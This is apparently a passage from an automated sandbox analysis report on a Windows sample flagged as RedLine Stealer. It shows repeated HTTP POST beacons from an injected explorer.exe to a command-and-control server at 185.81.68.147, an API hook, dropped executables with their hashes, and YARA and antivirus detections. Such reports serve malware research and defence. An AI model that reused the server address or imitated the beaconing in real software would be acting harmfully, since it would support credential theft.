                                                                                                                                                                                                                      Dec 17, 2024 10:16:47.867187977 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:47.987076998 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:49.322870970 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:48 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      57192.168.2.849769185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:49.546920061 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:49.667061090 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:51.006777048 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:50 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      58192.168.2.849770185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:51.234385014 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:51.354208946 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:52.681742907 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:51 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      59192.168.2.849771185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:52.922429085 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:53.042423964 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:54.355576992 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:53 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      60192.168.2.849772185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:54.593786955 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:54.713641882 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:56.037787914 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:55 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      61192.168.2.849773185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:56.266467094 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:56.386661053 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:57.877729893 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:56 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      62192.168.2.849774185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:58.114125013 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:58.234004974 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:59.714562893 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:58 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      63192.168.2.849775185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:59.937259912 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:17:00.057138920 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:17:01.412868977 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:17:00 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Code Manipulations

                                                                                                                                                                                                                      User Modules

                                                                                                                                                                                                                      Hook Summary

                                                                                                                                                                                                                      Function NameHook TypeActive in Processes
                                                                                                                                                                                                                      CreateProcessInternalWINLINEexplorer.exe

                                                                                                                                                                                                                      Processes

                                                                                                                                                                                                                      Process: explorer.exe, Module: KERNEL32.DLL
                                                                                                                                                                                                                      Function NameHook TypeNew Data
                                                                                                                                                                                                                      CreateProcessInternalWINLINE0xE9 0x90 0x00 0x07 0x75 0x5D

                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                      Start time:04:14:54
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\uFVgJVXaEU.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\uFVgJVXaEU.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff7e83c0000
                                                                                                                                                                                                                      File size:312'320 bytes
                                                                                                                                                                                                                      MD5 hash:BFAE2C479A12CBC660E580A84D3E3CE0
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                      Start time:04:14:54
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6ec840000
                                                                                                                                                                                                                      File size:632'808 bytes
                                                                                                                                                                                                                      MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                      Start time:04:14:54
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff67e6d0000
                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000003.00000002.2672467655.000001F00D07E000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                      Start time:04:14:54
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6345c0000
                                                                                                                                                                                                                      File size:69'632 bytes
                                                                                                                                                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                      Start time:04:14:54
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                      Imagebase:0x7ff62d7d0000
                                                                                                                                                                                                                      File size:5'141'208 bytes
                                                                                                                                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000005.00000000.1435821747.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000003.1489240627.000000000A37D000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000005.00000000.1436005236.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                      Start time:04:15:02
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe"
                                                                                                                                                                                                                      Imagebase:0x4c0000
                                                                                                                                                                                                                      File size:307'712 bytes
                                                                                                                                                                                                                      MD5 hash:7B6730CA4DA283A35C41B831B9567F15
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000000.1490441463.00000000004C2000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe, Author: Joe Security
                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                      • Detection: 92%, ReversingLabs
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                      Start time:04:15:06
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6c5db0000
                                                                                                                                                                                                                      File size:312'320 bytes
                                                                                                                                                                                                                      MD5 hash:BFAE2C479A12CBC660E580A84D3E3CE0
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                      • Detection: 58%, ReversingLabs
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                      Start time:04:15:07
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff67e6d0000
                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                      Start time:04:15:07
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6ec840000
                                                                                                                                                                                                                      File size:632'808 bytes
                                                                                                                                                                                                                      MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                      Start time:04:15:07
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6345c0000
                                                                                                                                                                                                                      File size:69'632 bytes
                                                                                                                                                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                      Start time:04:15:13
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff7f24f0000
                                                                                                                                                                                                                      File size:5'915'952 bytes
                                                                                                                                                                                                                      MD5 hash:BB0BE25BDD2121FA0BDDF6AC59D4FA8D
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                      • Detection: 33%, ReversingLabs
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                      Start time:04:15:15
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff7f24f0000
                                                                                                                                                                                                                      File size:5'915'952 bytes
                                                                                                                                                                                                                      MD5 hash:BB0BE25BDD2121FA0BDDF6AC59D4FA8D
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                                      Start time:04:15:15
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6c5db0000
                                                                                                                                                                                                                      File size:312'320 bytes
                                                                                                                                                                                                                      MD5 hash:BFAE2C479A12CBC660E580A84D3E3CE0
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                      Start time:04:15:15
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff67e6d0000
                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                      Start time:04:15:15
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6ec840000
                                                                                                                                                                                                                      File size:632'808 bytes
                                                                                                                                                                                                                      MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                      Start time:04:15:15
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6345c0000
                                                                                                                                                                                                                      File size:69'632 bytes
                                                                                                                                                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:43.1%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                        Signature Coverage:50%
                                                                                                                                                                                                                        Total number of Nodes:480
                                                                                                                                                                                                                        Total number of Limit Nodes:11
